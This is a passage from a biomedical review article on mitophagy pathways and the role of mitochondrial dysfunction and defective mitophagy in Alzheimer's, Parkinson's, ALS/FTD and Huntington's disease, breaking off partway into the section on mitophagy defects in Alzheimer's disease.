1. Introduction {#sec1-cells-09-00150} =============== Mitochondria are termed the "powerhouses" of the cell, and generate the majority of the cell's supply of adenosine triphosphate (ATP) through the oxidative phosphorylation system (OXPHOS) in which electrons produced by the citric acid cycle are transferred down the mitochondrial respiratory complexes. Neurons have particularly high and continuous energy demands so that mitochondrial function is essential for maintaining neuronal integrity and responsiveness \[[@B1-cells-09-00150],[@B2-cells-09-00150],[@B3-cells-09-00150],[@B4-cells-09-00150],[@B5-cells-09-00150],[@B6-cells-09-00150],[@B7-cells-09-00150]\]. Mitochondrial energy production fuels various critical neuronal functions, especially the ATP-dependent neurotransmission \[[@B1-cells-09-00150],[@B3-cells-09-00150],[@B8-cells-09-00150]\]. Along with regulating energy levels, mitochondria have a high capacity to sequester excessive Ca^2+^ and release Ca^2+^ so as to prolong residual levels at synaptic terminals \[[@B9-cells-09-00150],[@B10-cells-09-00150]\]. Through this mechanism, mitochondria play essential roles in maintaining and regulating neurotransmission \[[@B11-cells-09-00150],[@B12-cells-09-00150]\], as well as certain types of short-term synaptic plasticity \[[@B13-cells-09-00150],[@B14-cells-09-00150]\]. In addition, mounting evidence has demonstrated the critical role of mitochondria in the maintenance of cellular homeostasis \[[@B15-cells-09-00150]\]. Glucose was shown to be an efficient energy source in neurons and glia that can consume energy produced in parallel by glycolysis and OXPHOS. However, upon neural network activation, the energy demand is robustly enhanced. Given ATP as the main energy source in neurons, mitochondrial energy metabolism thus may play a major role in supplying ATP to fuel these neuronal activities. Importantly, distinct mitochondrial energetic status might also have a significant impact on the cellular signaling pathways. Aged and dysfunctional mitochondria are defective in ATP production and Ca^2+^ buffering, leading to energy deficit and interruptions of neuronal function and health. Furthermore, damaged mitochondria trigger concomitant leakage of electrons and thus promote the production of harmful reactive oxygen species (ROS) that can damage nucleic acids, proteins, and membrane lipids \[[@B1-cells-09-00150],[@B16-cells-09-00150],[@B17-cells-09-00150],[@B18-cells-09-00150]\]. Moreover, mitochondrial oxidative stress leads to the release of cytochrome *c*, a mitochondrial intermembrane space protein, into the cytosol, inducing DNA damage, caspase activation, and apoptosis \[[@B6-cells-09-00150]\]. A large body of work suggests that mitochondrial dysfunction underlies cognitive decline in neuronal aging and is one of the most notable hallmarks of age-associated neurodegenerative diseases. Mitochondrial damage causes energy deficit, oxidative stress, and impaired cellular signaling, which has been linked to the pathogenesis of neurodegeneration diseases \[[@B2-cells-09-00150],[@B19-cells-09-00150],[@B20-cells-09-00150],[@B21-cells-09-00150]\]. Given that a mitochondrion's half-life is estimated to be about 30 days \[[@B22-cells-09-00150],[@B23-cells-09-00150]\], cells have developed the interconnected and elaborate pathways through the balance of mitochondrial biogenesis and efficient removal of damaged mitochondria to ensure the maintenance of mitochondrial integrity and bioenergetic functions. 
Mitophagy, a selective form of autophagy, constitutes a key pathway of mitochondrial quality control mechanisms involving sequestration of defective mitochondria into autophagosomes for subsequent lysosomal degradation \[[@B1-cells-09-00150],[@B2-cells-09-00150],[@B24-cells-09-00150],[@B25-cells-09-00150]\]. Disruption of mitophagy has been indicated in aging and various diseases, including neurodegenerative disorders such as Alzheimer's disease (AD), Parkinson's disease (PD), amyotrophic lateral sclerosis (ALS), and Huntington's disease (HD) \[[@B7-cells-09-00150],[@B26-cells-09-00150]\]. This review aims to provide a thorough and timely overview of the mitophagy pathways, summarize the underlying mechanisms of mitophagy defects in AD and other age-related neurodegenerative diseases, and highlight the possible therapeutic strategies targeting mitophagy towards confronting mitochondrial dysfunction and neurodegeneration. 2. Overview of the Mitophagy Pathways {#sec2-cells-09-00150} ===================================== Mitophagy (mitochondrial autophagy) is the only known cellular pathway through which entire mitochondria are completely eliminated within lysosomes. Under physiological conditions, mitophagy plays an essential role in the basal mitochondrial turnover and maintenance. More importantly, mitophagy can also be robustly induced in response to a variety of pathological stimuli \[[@B7-cells-09-00150],[@B25-cells-09-00150],[@B26-cells-09-00150],[@B27-cells-09-00150]\]. There are a number of mitophagy pathways that have been identified ([Figure 1](#cells-09-00150-f001){ref-type="fig"}). 2.1. PINK1-Parkin-Mediated Mitophagy {#sec2dot1-cells-09-00150} ------------------------------------ PTEN-induced putative kinase protein 1 (PINK1)-Parkin-mediated mitophagy is the most heavily studied and the best-understood mitophagy pathway \[[@B28-cells-09-00150],[@B29-cells-09-00150],[@B30-cells-09-00150]\]. In brief, loss of mitochondrial membrane potential (Δψ~m~) accumulates PINK1 on the outer membrane of mitochondria (OMM) to recruit and activate Parkin, an E3 ubiquitin ligase, through phosphorylation of ubiquitin \[[@B31-cells-09-00150],[@B32-cells-09-00150],[@B33-cells-09-00150],[@B34-cells-09-00150],[@B35-cells-09-00150],[@B36-cells-09-00150],[@B37-cells-09-00150],[@B38-cells-09-00150]\]. Parkin then ubiquitinates a number of OMM proteins and subsequently activates the ubiquitin-proteasome system (UPS) to degrade these ubiquitinated OMM proteins \[[@B39-cells-09-00150],[@B40-cells-09-00150],[@B41-cells-09-00150],[@B42-cells-09-00150],[@B43-cells-09-00150]\]. This leads to recruitment of the autophagy machinery to promote the engulfment of damaged mitochondria by phagophore or isolation membranes and thus formation of mitophagosomes destined for removal via the lysosomal system. The roles of PINK1 and Parkin in mitochondrial quality control and mitophagy have been supported by multiple studies in *Drosophila* \[[@B28-cells-09-00150],[@B44-cells-09-00150],[@B45-cells-09-00150],[@B46-cells-09-00150],[@B47-cells-09-00150]\]. The PINK1-Parkin pathway was shown to facilitate mitophagy as well as selective mitochondrial respiratory chain turnover \[[@B28-cells-09-00150],[@B44-cells-09-00150],[@B45-cells-09-00150],[@B46-cells-09-00150],[@B47-cells-09-00150]\]. Furthermore, genetic and clinical data have provided clear evidence to support the notion that the PINK1-Parkin pathway is involved in the pathogenesis of PD \[[@B48-cells-09-00150],[@B49-cells-09-00150]\]. 
However, recent in vivo studies indicate that PINK1 and Parkin are not critical for basal mitophagy in a range of tissues including the brain \[[@B50-cells-09-00150],[@B51-cells-09-00150]\]. More recent studies have been focused on understanding the PINK1-Parkin-independent mitophagy pathways. 2.2. Ubiquitin-Mediated Mitophagy Independent of Parkin {#sec2dot2-cells-09-00150} ------------------------------------------------------- Other E3 ubiquitin ligases that can also mediate the removal of dysfunctional mitochondria have been identified \[[@B52-cells-09-00150]\], pointing to PINK1-Parkin-independent mitophagy mechanisms. Mitochondrial ubiquitin ligase 1 (MUL1, also known as MAPL, GIDE, and MULAN) was reported to play a role in the regulation of mitophagy through multiple mechanisms. MUL1 interacts with mitochondrial fission GTPase protein dynamin-related protein 1 (Drp1) and mitochondrial fusion protein Mitofusin, both of which are the substrates of Parkin \[[@B53-cells-09-00150],[@B54-cells-09-00150]\]. MUL1 has no effect on PINK1-Parkin-mediated mitophagy, but can suppress PINK1 or Parkin mutant phenotypes in both *Drosophila* and mouse neurons. This suppression is attributed to the ubiquitin-dependent degradation of Mitofusin. Interestingly, double mutants of MUL1 with either PINK1 or Parkin show much more severe phenotypes. Moreover, MUL1 contains an LC3-interacting region (LIR) motif in the RING domain through which MUL1 interacts with GABAA receptor-associated protein (GABARAP), a member of the Atg8 family that plays a key role in autophagy and mitophagy \[[@B55-cells-09-00150]\]. Thus, these observations collectively suggest that MUL1 functions in a pathway parallel to the PINK1-Parkin pathway. In addition to MUL1, a recent study reported PINK1-synphilin-1-SIAH-1 as another newly discovered Parkin-independent pathway that can promote PINK1-dependent mitophagy in the absence of Parkin \[[@B56-cells-09-00150]\]. 2.3. Receptor-Mediated Mitophagy {#sec2dot3-cells-09-00150} -------------------------------- The BCL-2 homology 3 (BH3)-containing protein NIP3-like X (NIX, also known as BNIP3L), an OMM protein, was reported to play an important role in mitochondrial turnover in erythrocytes \[[@B57-cells-09-00150]\]. NIX/BNIP3L contains an LIR motif at the amino-terminus that binds to LC3 on phagophore or isolation membranes, and is transcriptionally upregulated during erythrocyte differentiation \[[@B58-cells-09-00150]\]. Such a mechanism enables NIX/BNIP3L to serve as a selective mitophagy receptor and promote recruitment of the autophagy machinery to the surface of damaged mitochondria in erythroid cells. NIX/BNIP3L was also reported to be involved in hypoxia-induced mitophagy, during which forkhead box O3 (FOXO3) and hypoxia-inducible factor (HIF) transcriptionally regulate NIX/BNIP3L along with BNIP3 \[[@B59-cells-09-00150]\]. Notably, overexpression of NIX/BNIP3L can restore mitophagy in skin fibroblasts from PD patients carrying mutations in *PARK6* or *PARK2* \[[@B60-cells-09-00150]\], suggesting that NIX/BNIP3L acts independently of PINK1-Parkin-mediated mitophagy. NIX/BNIP3L and BNIP3 were reported to be upregulated upon neuronal stress \[[@B61-cells-09-00150],[@B62-cells-09-00150]\]. However, the extent to which NIX/BNIP3L and BNIP3 might participate in neuronal mitophagy remains unclear. FUN14 domain containing 1 (FUNDC1) also functions as a mitophagy receptor and regulates the autophagic clearance of mitochondria under hypoxic stress.
Studies have demonstrated that the mitochondrial phosphatase phosphoglycerate mutase family member 5 (PGAM5) dephosphorylates FUNDC1 to activate mitophagy during hypoxia \[[@B63-cells-09-00150],[@B64-cells-09-00150],[@B65-cells-09-00150]\]. Additionally, FK506 Binding Protein 8 (FKBP8) was recently reported to have LIR domains and can mediate Parkin-independent mitophagy by recruiting LC3A \[[@B66-cells-09-00150]\]. Collectively, these observations suggest that specific mitophagy receptors on the OMM play an essential role in recruiting the autophagy machinery to damaged mitochondria for lysosomal clearance. 2.4. Lipid-Mediated Mitophagy {#sec2dot4-cells-09-00150} ----------------------------- Recent studies have demonstrated that lipids can also act as an elimination signal to mediate recruitment of injured mitochondria to the autophagy pathway. Apart from ubiquitin- or receptor-mediated mitophagy, this pathway involves the direct interaction of LC3 with the phospholipid cardiolipin, and was originally observed in neuroblastoma cells and primary cortical neurons incubated with rotenone, staurosporine, or 6-hydroxydopamine \[[@B67-cells-09-00150]\]. Cardiolipin is primarily found in the inner membrane of mitochondria (IMM) and is externalized to the OMM upon mitochondrial damage. Three enzymatic translocations are needed for the externalization of cardiolipin, which are mediated by the phospholipid scramblase-3 of mitochondria and the inner and outer membrane spanning hexameric complex of mitochondrial nucleoside diphosphate kinase D (NDPK-D/NM23-H4) in SH-SY5Y cells or Tafazzin (TAZ) in mouse embryonic fibroblasts (MEFs), respectively \[[@B67-cells-09-00150],[@B68-cells-09-00150],[@B69-cells-09-00150]\]. Furthermore, cardiolipin interacts with LC3, and this interaction is facilitated by the negatively charged basic residues in LC3 and charged head group of cardiolipin. Thus, cardiolipin-mediated mitophagy is independent of PINK1 and Parkin. Importantly, cardiolipin downregulation or mutagenesis of LC3 at the sites predicted to interact with cardiolipin was shown to impair mitophagosome formation \[[@B67-cells-09-00150]\]. In addition, genome-wide screens indicate that F-box and WD40 domain protein 7 (FBXW7), sterol regulatory element binding transcription factor 1 (SREBF1), and other components of the lipogenesis pathway may play a role in the regulation of Parkin-mediated mitophagy \[[@B70-cells-09-00150]\]. Additionally, upon Drp1-mediated mitochondrial fission, ceramide was shown to promote autophagic recruitment of mitochondria through direct interaction of ceramide with LC3B-II \[[@B71-cells-09-00150]\]. 2.5. Neuronal Mitophagy {#sec2dot5-cells-09-00150} ----------------------- Neurons are highly polarized cells with unique properties in structure and function. Mitochondrial quality control mechanisms that efficiently sense and eliminate mitochondria damaged over usage, aging, or disease could be critical for neuronal health. Mitophagy is currently believed to constitute the major cellular pathway for mitochondrial quality control in neurons. While basal mitophagy is known to be required for the maintenance of neuronal homeostasis, mounting evidence has shown that mitophagy can be upregulated in response to various pathological stimuli ([Figure 2](#cells-09-00150-f002){ref-type="fig"}). Cardiolipin-mediated mitophagy can be induced in primary cortical neurons treated with the mitochondrial complex I inhibitor rotenone \[[@B67-cells-09-00150]\]. 
As for Parkin-mediated mitophagy, Δψ~m~ dissipation triggers Parkin translocation onto depolarized mitochondria in neurons after treatment with CCCP, an Δψ~m~ uncoupler \[[@B72-cells-09-00150],[@B73-cells-09-00150]\]. Interestingly, Parkin-targeted mitochondria primarily accumulate in the somatodendritic region of neurons where they undergo autophagic sequestration for lysosomal degradation. Moreover, mitophagy activation reduces anterograde transport, but increases retrograde transport of axonal mitochondria, suggesting that damaged mitochondria are trafficked back to the soma for mitophagic clearance. Parkin-dependent mitophagy was also discovered under AD-linked pathophysiological conditions in the absence of any Δψ~m~ dissipating reagent \[[@B74-cells-09-00150]\]. The spatial aspects of Parkin-dependent mitophagy were also observed in vivo. In particular, the PINK1 and Parkin mutant *Drosophila* exhibit abnormal tubular and reticular mitochondria restricted to the cell body, as well as normal morphology with reduced mitochondrial flux within axons \[[@B46-cells-09-00150],[@B47-cells-09-00150]\]. In addition to *Drosophila*, the evidence from examination of Purkinje neurons in the mito-QC reporter mice suggests that the majority of mitochondrial turnover occurs in the Purkinje somata. This supports the view that damaged mitochondria or mitophagosomes are returned to the cell body for lysosomal clearance \[[@B75-cells-09-00150]\]. Collectively, these in vitro and in vivo observations consistently suggest that the soma is in the focus of neuronal mitophagy, a selective process with a function to restrict damaged mitochondria to the soma and thus limit the impact of impaired mitochondrial function on distal axons. 2.6. Mitophagy In Vivo {#sec2dot6-cells-09-00150} ---------------------- The mitophagy pathways have been extensively studied *in vitro*. To address the basal mitophagy in vivo, a number of transgenic mice expressing sensors to monitor the delivery of mitochondria to acidic organelles (lysosomes) have been developed \[[@B75-cells-09-00150],[@B76-cells-09-00150]\]. These studies have demonstrated active mitochondrial delivery to acidic organelles in multiple tissues but with variable rates. A recent work further shows that the basal mitophagy is independent of the PINK1 pathway \[[@B51-cells-09-00150]\]. Consistently, studies from *Drosophila* expressing fluorescent mitophagy reporters, either mito-Keima or mito-QC, also reveal robust basal mitophagy in different tissues \[[@B50-cells-09-00150]\]. However, null mutations of either PINK1 or Parkin do not lead to altered rates of mitochondrial delivery into lysosomes, suggesting nonessential roles of PINK1 and Parkin in the basal mitophagy in vivo. These data are also consistent with the observations from mice with the deletion of *PARK6* or *PARK2*. These mice lack strong phenotypes, such as dopaminergic neuron loss \[[@B77-cells-09-00150],[@B78-cells-09-00150],[@B79-cells-09-00150],[@B80-cells-09-00150],[@B81-cells-09-00150]\]. Importantly, the evidence of mitophagy activation is clear in the brain tissues of human patients with neurodegenerative diseases \[[@B74-cells-09-00150],[@B82-cells-09-00150],[@B83-cells-09-00150]\]. Given multiple distinct mechanisms that have been identified to target damaged mitochondria for autophagy, other PINK1-Parkin-independent pathways or other as yet undefined mechanisms likely play more important role in the basal neuronal mitophagy. 
Therefore, the involvement of these mitophagy pathways in the basal mitochondrial turnover and in response to specific disease-related stressors needs to be carefully determined in vivo. 3. Mitochondrial Dysfunction in Neurodegenerative Diseases {#sec3-cells-09-00150} ========================================================== Mitochondrial defects are a significant concern in the aging nervous system and have been consistently linked to age-related neurodegenerative diseases, suggesting that the underlying mechanisms might be somewhat shared ([Figure 3](#cells-09-00150-f003){ref-type="fig"}). 3.1. Aβ and Tau-Linked Mitochondrial Abnormalities {#sec3dot1-cells-09-00150} -------------------------------------------------- AD is the most common form of neurodegenerative diseases in aging populations. Progression of the disease involves cognitive decline, memory loss, and neuronal death in the cerebral cortex and subcortical regions. AD patient brains are characterized by extracellular amyloid plaque deposits, composed of agglomerated amyloid β (Aβ) peptides, as well as intracellular accumulation of neurofibrillary tangles (NFTs), consisting of hyperphosphorylated tau (phospho-tau) protein. Mitochondrial disturbances have been suggested as a hallmark of AD as the patients exhibit early metabolic alterations prior to any histopathological or clinical manifestations \[[@B84-cells-09-00150]\]. Mitochondrial dysfunction, oxidative stress, and mitochondrial DNA (mtDNA) changes are prominent pathological features reported in AD postmortem brains \[[@B85-cells-09-00150],[@B86-cells-09-00150],[@B87-cells-09-00150],[@B88-cells-09-00150],[@B89-cells-09-00150],[@B90-cells-09-00150],[@B91-cells-09-00150],[@B92-cells-09-00150],[@B93-cells-09-00150],[@B94-cells-09-00150],[@B95-cells-09-00150]\]. Importantly, a growing body of evidence has indicated a major role of mitochondrial defects in the pathogenesis of AD \[[@B2-cells-09-00150],[@B96-cells-09-00150],[@B97-cells-09-00150],[@B98-cells-09-00150]\]. The degree of cognitive dysfunction in AD was linked to the extent of Aβ accumulation within mitochondria and mitochondrial abnormalities \[[@B99-cells-09-00150]\]. Aβ has been proposed to be a key player in mediating mitochondrial damage. Aβ was found to impair multiple aspects of mitochondrial function \[[@B100-cells-09-00150],[@B101-cells-09-00150],[@B102-cells-09-00150]\], including function of the electron transport chain (ETC) \[[@B103-cells-09-00150]\], ROS production \[[@B104-cells-09-00150],[@B105-cells-09-00150],[@B106-cells-09-00150]\], mitochondrial dynamics \[[@B91-cells-09-00150],[@B103-cells-09-00150],[@B107-cells-09-00150],[@B108-cells-09-00150]\], and mitochondrial transport \[[@B109-cells-09-00150],[@B110-cells-09-00150],[@B111-cells-09-00150]\]. The possible routes for Aβ to enter into mitochondria were thought to be through the translocase of the outer membrane (TOM) complex or mitochondrial-associated endoplasmic reticulum (ER) membrane (MAM) \[[@B112-cells-09-00150],[@B113-cells-09-00150],[@B114-cells-09-00150],[@B115-cells-09-00150]\]. In addition to intracellular Aβ, mitochondria can also take up internalized extracellular Aβ \[[@B114-cells-09-00150],[@B116-cells-09-00150]\]. Aβ1--42 treatment was shown to lead to the opening of mitochondrial permeability transition pore (mPTP) in cultured cortical neural progenitor cells. While transient mPTP opening decreases cell proliferation, prolonged mPTP opening irreversibly causes cell death \[[@B117-cells-09-00150]\]. 
Consistent with this observation, an interesting work in a live AD mouse model provided direct evidence that fragmented and defective mitochondria are limited to the vicinity of extracellular amyloid plaques that likely serve as a focal source to promote abnormal accumulation of Aβ within mitochondria and thus exacerbate Aβ-linked damage \[[@B118-cells-09-00150]\]. The mechanisms underlying Aβ-mediated mitochondrial toxicity have been carefully investigated by several studies. The interactions of Aβ with Aβ-binding alcohol dehydrogenase (ABAD), a mitochondrial matrix protein, and cyclophilin D (CypD), a component of the mitochondrial transition pore, were reported to mediate Aβ-induced cytotoxic effects \[[@B101-cells-09-00150],[@B102-cells-09-00150]\]. In particular, ABAD was shown to be upregulated in AD neurons. Overexpression of ABAD can exacerbate Aβ-induced cellular oxidative stress and cell death. Aβ also forms a complex with CypD in the cortical regions of postmortem human AD patient brains and an AD mouse model \[[@B102-cells-09-00150]\]. Deletion of CypD in AD mice rescues the mitochondrial phenotypes including impaired Ca^2+^ uptake, mitochondrial swelling due to increased Ca^2+^, depolarized Δψ~m~, elevated oxidative stress, decrease in ADP-induced respiration control rate, and reduced complex IV activity and ATP levels. Moreover, CypD deficiency can improve synaptic function as well as learning and memory in an AD mouse model \[[@B102-cells-09-00150]\]. These observations collectively suggest that Aβ-CypD interaction mediates AD-associated mitochondrial defects. Taken together, these pieces of evidence indicate that the aberrant accumulation of Aβ within mitochondria likely plays a causative role in impaired mitochondrial function in AD. Pathogenic forms of tau can also induce mitochondrial damage. A number of studies have demonstrated that phospho-tau specifically impairs complex I of the mitochondrial respiratory chain, resulting in increased ROS production, loss of Δψ~m~, lipid peroxidation, and reduced activities of detoxifying enzymes such as superoxide dismutase (SOD) \[[@B119-cells-09-00150],[@B120-cells-09-00150]\]. Overexpression of the mutant human tau protein htauP301L was reported to reduce ATP levels and increase susceptibility to oxidative stress in cultured neuroblastoma cells \[[@B121-cells-09-00150]\]. Disrupted activity and altered composition of mitochondrial enzymes can also be detected in the P301S mouse model of tauopathy \[[@B122-cells-09-00150]\]. In the pR5 mice overexpressing the htauP301L, mitochondrial dysfunction was evidenced by impaired mitochondrial respiration and ATP synthesis, decreased complex I activity, and increased ROS levels \[[@B123-cells-09-00150],[@B124-cells-09-00150]\]. Phospho-tau was also reported to directly interact with VDAC in AD brains. This interaction was proposed to impair mitochondrial function likely through blocking mitochondrial pores \[[@B125-cells-09-00150]\]. Furthermore, mitochondrial stress was shown, in turn, to enhance hyperphosphorylation of tau in a mouse model lacking SOD2 \[[@B126-cells-09-00150]\]. Inhibition of mitochondrial complex I activity reduces ATP levels, resulting in a redistribution of tau from the axon to the soma and subsequent cell death \[[@B127-cells-09-00150]\]. Thus, these observations suggest that the toxic effects of tau on mitochondria could be reciprocal and that mitochondrial deficiency might play a critical role in the development of tau pathology. 
Both Aβ and pathogenic tau have deleterious effects on mitochondrial dynamics through which impact mitochondrial function. Studies on postmortem brain tissues from human patients with AD and mouse models have demonstrated increased levels of Drp1 and Fis1 and reduced levels of mitofusin 1 (Mfn1), Mfn2, and OPA1. Moreover, Aβ overproduction, phospho-tau accumulation, as well as abnormal interactions of Drp1 with Aβ or phospho-tau cause excessive mitochondrial fission and fragmentation, which tend to increase as AD progresses \[[@B91-cells-09-00150],[@B97-cells-09-00150],[@B108-cells-09-00150],[@B125-cells-09-00150],[@B128-cells-09-00150]\]. Cells overexpressing mutant tau associated with frontotemporal dementia (FTD) with Parkinsonism linked to chromosome 17 (FTDP-17) display decreased rates of mitochondrial fusion and fission and enhanced vulnerability to oxidative stress \[[@B121-cells-09-00150]\]. Strikingly, reduction of Drp1 expression can protect against mutated tau-induced mitochondrial dysfunction \[[@B129-cells-09-00150]\]. Collectively, these data suggest that the pathogenic forms of tau and Aβ could impair mitochondrial function either through direct interaction with VDAC, ABAD, or CypD, or indirectly through their toxic effects on mitochondrial dynamics. 3.2. Mitochondrial Defects with Synucleinopathies {#sec3dot2-cells-09-00150} ------------------------------------------------- PD is the second most common form of neurodegenerative disease, which is characterized by the aberrant accumulation of α-synuclein (α-syn) in the form of Lewy bodies, especially in the substantia nigra. α-syn is abundant throughout the central nervous system and Lewy bodies are a defining feature of many clinical phenotypes known as synucleinopathies \[[@B130-cells-09-00150],[@B131-cells-09-00150]\]. Importantly, impaired mitochondrial function is also a pathological feature of both sporadic and familial PD \[[@B20-cells-09-00150],[@B28-cells-09-00150],[@B44-cells-09-00150],[@B49-cells-09-00150],[@B132-cells-09-00150],[@B133-cells-09-00150],[@B134-cells-09-00150]\]. The relationship between α-syn and mitochondria has been explored in many studies. Some evidence showed that mitochondria could be the main targets of α-syn. In particular, the oligomerization and aggregation of α-syn can cause deficits in the complex I activities, leading to reduced ATP levels, depolarized Δψ~m~, and the release of cytochrome *c* into the cytosol to trigger apoptosis \[[@B135-cells-09-00150],[@B136-cells-09-00150]\]. A number of studies have shown that α-syn is directly localized in mitochondria, and can be detected in isolated mitochondria from PD patient brains. Mitochondrial localization of α-syn has a negative impact on mitochondrial function, morphology, and dynamics \[[@B137-cells-09-00150],[@B138-cells-09-00150],[@B139-cells-09-00150],[@B140-cells-09-00150],[@B141-cells-09-00150],[@B142-cells-09-00150],[@B143-cells-09-00150]\]. α-syn has a cryptic mitochondrial targeting sequence located at its amino terminal region through which α-syn is constitutively imported into mitochondria and associates with the IMM. Such a mechanism leads to reduced complex I activities and elevated ROS levels in human dopaminergic neurons \[[@B140-cells-09-00150]\]. Moreover, oligomeric and dopamine-modified α-syn disrupts the association of the OMM translocase TOM20 and its coreceptor, TOM22, resulting in protein import impairment \[[@B144-cells-09-00150]\]. 
Thus, diminished import of mitochondrial proteins impairs mitochondrial function in nigrostriatal neurons, as reflected by deficient respiration, loss of Δψ~m~, and enhanced production of ROS. α-syn can also affect mitochondrial dynamics and mitophagy. Basically, α-syn is known to bind to the lipid membranes, especially the lipids of the ER membrane or the MAM through which ER interacts with mitochondria. Mutated α-syn decreases the ER-mitochondria contact or interaction, leading to MAM dysfunction and thus mitochondrial fragmentation \[[@B141-cells-09-00150]\]. Other studies into PD have demonstrated that α-syn causes mitochondrial fragmentation through either direct binding or as a result of increased Drp1 \[[@B142-cells-09-00150],[@B145-cells-09-00150]\]. Cleavage of Opa1 was found in dopaminergic neurons with overexpression of α-syn, resulting in decreased mitochondrial fusion \[[@B145-cells-09-00150]\]. Consistently, suppression of Drp1-mediated mitochondrial fission was reported to protect cells from α-syn-induced cytotoxicity \[[@B146-cells-09-00150]\]. In addition, studies have demonstrated the direct binding of α-syn to cardiolipin \[[@B147-cells-09-00150],[@B148-cells-09-00150]\]. Furthermore, PD-related SNCA-mutant neurons exhibit increased externalization of cardiolipin to the OMM. Externalized cardiolipin was shown to bind to and promote refolding α-syn fibrils. Importantly, the exposed cardiolipin initiates LC3 recruitment to mitochondria and thus enhances mitophagic turnover, leading to reduced mitochondrial volume and exacerbation of mutant α-syn-induced mitochondrial dysfunction \[[@B148-cells-09-00150]\]. On the other hand, mitophagy defects were also proposed to play a significant role in PD pathogenesis, especially augmenting α-syn accumulation and its mediated neurotoxicity \[[@B149-cells-09-00150],[@B150-cells-09-00150],[@B151-cells-09-00150]\]. 3.3. ALS and FTD-Associated Mitochondrial Toxicity {#sec3dot3-cells-09-00150} -------------------------------------------------- ALS is a devastating disease characterized by motor neuron degeneration. A hallmark of ALS, as in the pathologies of other neurodegenerative diseases, is the abnormal accumulation of misfolded proteins and protein aggregates within the affected motor neurons. FTD affects the basal ganglia and cortical neurons, leading to cognitive deficits, language deficiency along with altered social behavior and conduct. Even though the affected neuron types are quite different, ALS and FTD show the similarities in genetic background and pathological processes and also share the common pathways of neurodegeneration \[[@B152-cells-09-00150],[@B153-cells-09-00150]\]. Defects in oxidative phosphorylation, Ca^2+^ buffering, and increased ROS production have been linked to ALS pathogenesis \[[@B154-cells-09-00150]\]. Multiple studies in cell culture and in transgenic animal models of ALS reveal alterations in oxidative metabolism linked to changes in ETC activity and reduced ATP synthesis \[[@B155-cells-09-00150],[@B156-cells-09-00150],[@B157-cells-09-00150],[@B158-cells-09-00150]\]. More importantly, mitochondria purified from ALS patients display impaired Ca^2+^ homeostasis and increased ROS levels. Such defects are coupled with oxidative damage including altered tyrosine nitration and protein carbonylation \[[@B159-cells-09-00150],[@B160-cells-09-00150]\]. 
Indeed, glutamate-receptor mediated excitotoxicity was linked to overloaded mitochondrial Ca^2+^ and increased ROS levels in spinal motor neurons cultured from an ALS animal model \[[@B161-cells-09-00150]\]. Aggregation of the transactive response DNA-binding protein 43 kDa (TDP-43) and fused in sarcoma (FUS) is a pathological hallmark of both ALS and FTD. Both TDP-43 and FUS are RNA-binding proteins and contain glycine-rich prion-like domains that can increase the propensity of TDP-43 and FUS for aggregation as well as cell-to-cell transmission. Aged animals expressing mutant FUS exhibit abnormal accumulation of ubiquitin-positive aggregates, which correlates with neuron loss. These aggregates also stain positive for mitochondrial protein cytochrome *c*, suggesting that damaged mitochondria recruit the autophagy machinery for removal through mitophagy \[[@B162-cells-09-00150]\]. A single postmortem analysis of an FUS mutation carrier uncovered similar defects. Additionally, C- and N-terminal fragments of TDP-43 were identified within mitochondria. Furthermore, animal models of TDP-43 pathology exhibit membranous organelle redistribution and clustering within cytoplasmic inclusions accompanied by morphological and ultrastructural alterations, as well as abnormal mitochondrial dynamics, trafficking, and quality control \[[@B163-cells-09-00150],[@B164-cells-09-00150],[@B165-cells-09-00150]\]. Thus, these data consistently indicate the phenotypes of mislocalized, fragmented, and defective mitochondria associated with ALS and FTD. 3.4. Mutant Htt-Induced Mitochondrial Damage {#sec3dot4-cells-09-00150} -------------------------------------------- HD is a neurodegenerative genetic disease that affects muscle coordination and leads to cognitive decline and psychiatric symptoms \[[@B166-cells-09-00150]\]. This autosomal dominant inherited neurodegenerative disease is the most common genetic cause of abnormal involuntary movements called chorea, and is characterized by mutations in the huntingtin gene (*HTT*) that result in abnormal expansion of the cytosine--adenine--guanine (CAG) trinucleotide repeats in the *HTT* gene, encoding a polyglutamine (polyQ) tract at the N-terminal region of the huntingtin (Htt) protein. The N-terminus of Htt can be cleaved through protease activity, leading to formation of short and toxic polyQ peptides. The N-terminal fragments of Htt containing the polyQ tracts are more prone to aggregation and accumulate within the inclusions in the nucleus especially in the medium spiny neurons of the striatum \[[@B167-cells-09-00150],[@B168-cells-09-00150],[@B169-cells-09-00150],[@B170-cells-09-00150],[@B171-cells-09-00150]\]. Htt was reported to directly bind to Tim 23 on mitochondria, thus preventing protein import into mitochondria. This defect could be reversed through overexpressing Tim 23 \[[@B172-cells-09-00150],[@B173-cells-09-00150]\]. In addition, aggregate accumulation can disrupt ETC function \[[@B174-cells-09-00150]\]. Moreover, studies in HD patient brains found decreased activities of complex II, complex III, and complex IV. Reduced complex II activity was observed particularly in the striatum of HD patients. Such defects along with reduced ATP production were also demonstrated in other studies, which collectively point towards impaired OXPHOS and disrupted mitochondrial energy metabolism \[[@B175-cells-09-00150]\].
Importantly, overexpression of complex II reduces the mutant Htt-mediated toxic effects in striatal neurons. Moreover, alterations in mitochondrial dynamics were also reported in the striatum of HD patients, as well as in animal and cell models \[[@B176-cells-09-00150],[@B177-cells-09-00150]\]. Such a defect is caused by abnormal interaction of mutant Htt with Drp1, leading to Drp1-enhanced mitochondrial fission and thus mitochondrial fragmentation as well as cellular dysregulation and death \[[@B178-cells-09-00150]\]. 4. Mitophagy Defects in Neurodegenerative Diseases {#sec4-cells-09-00150} ================================================== Neurons have very high demand for ATP. Given that mitochondria are the major producer of ATP within cells, the nervous system is especially sensitive to mitochondrial damage. Inefficient elimination of injured mitochondria through mitophagy could be detrimental to neuronal health. Mitophagy deficit has been indicated in aging and the pathogenesis of age-associated neurodegenerative disorders. Studies into mitophagy suggest that defective mitophagy contributes to impaired mitochondrial function and neurodegeneration ([Figure 4](#cells-09-00150-f004){ref-type="fig"}). 4.1. Mitophagy Defects in AD {#sec4dot1-cells-09-00150} ---------------------------- Earlier studies revealed abnormal mitophagy in AD patient brains, as evidenced by autophagic accumulation of mitochondria in the soma of vulnerable AD neurons \[[@B87-cells-09-00150],[@B179-cells-09-00150],[@B180-cells-09-00150]\]. Among the multiple distinct mitophagy pathways, PINK1-Parkin-dependent mitophagy has been the focus of current studies in AD. We have shown that the Parkin pathway is robustly induced upon progressive Aβ accumulation and mitochondrial damage in human patient brains and animal models of AD \[[@B74-cells-09-00150]\]. Furthermore, cytosolic Parkin is depleted in AD brains over the disease's progression, resulting in mitophagic pathology and augmented mitochondrial defects. Consistently, in the AD patient-derived skin fibroblasts and brain biopsies, another study reported diminished Parkin along with abnormal 